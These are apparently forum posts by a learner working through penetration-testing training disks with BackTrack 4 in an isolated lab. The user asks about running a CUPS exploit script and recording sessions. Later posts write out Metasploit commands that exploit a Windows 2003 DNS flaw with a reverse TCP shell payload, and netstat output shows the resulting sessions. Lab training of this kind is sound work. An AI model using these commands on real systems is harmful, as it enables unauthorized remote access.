I am doing the Heorot.net's training disk in a isolated network with backtrack 4 pre-final.

I have to exploit to run one for cups and one for apache 2.2.4 but they are not in Metasploit

I know this is a basic question and I tried to find the answer in remote-exploit.org forum.

I am trying to exploit a CUPS1.1 port (printer service) and I found this site with this exploit:

http://www.securiteam.com/exploits/5ZP031F8VA.html

I really do not know what to do with this, I downloaded it and save it cups.pl and I try to run in with different way but do not work. Any suggestion please.

Thanks.

I found the solution, it just read the man page

script -a file_name

And when you exit the shell or type exit the keystroke stop recording.

I just finished the training in Heorot.net and now I want to do the Penetration Test Effort (PTE), I'm been playing but how do I record keystrokes with Backtrack pre-final version?

I search in this forum and I remember that somebody mention something like that but I could not find it.

Thanks.

It was difficult to convinced my supervisor to pay this training in www.heorot.net and I'm glad I did, I am learning a little bit and keep reading, watching the videos and practicing, after the two heorot training I will go to offensive-securiyt.com or CEH.

Interesting training and good cause.

Thanks

I used metasploit to exploit the dns in a Windows 2003 sp1, I got two console sessions. I created an user and add it to the administrator group. That was ok.

Now from the administrator side I want to see those sessions

I used netstat and I got:

TCP computer1:1619 192.168.0.190:4444 ESTABLISHED
TCP computer1:1722 192.168.0.190:4444 ESTABLISHED

Is tere any way to see the user in that sessions?


Thanks

I was using the live cd so I installed in the hard drive, and I did:

db_autopwn -p -r -t -e

and did not work, any idea.

Excelent video.

I am using BT pre-release. I ran:
db_nmap 192.168.0.9
Later

db_autopwn -p -t -e

The metasploit run a lot of exploits but I never get a session with the server. The target server is Windows 2003 SP1 and I know there is a vulnerability with tht dns. Now I go with:

use windows/dcerpc/msdns_zonename
set PAYLOAD windows/shell/reverse_tcp
exploit

And I GOT COMMAND PROMT.

So what is the difference, do I have to set another parameter with db_autopwn because I never got the command promt.

I liked a lot the article, I prefer to read before begin to pursue a certification, but I always use the certification to get knowledge and go a little deep.

This is the information I am looking for, to tell you the true about the interviews.

Thanks.

I asked this week to my company about this training, they said that is not the right time, bla, bla, bla, bla, so I think I will pay it from my own money, any way. I need to advance in this field.

Heorot

how did you feel the training?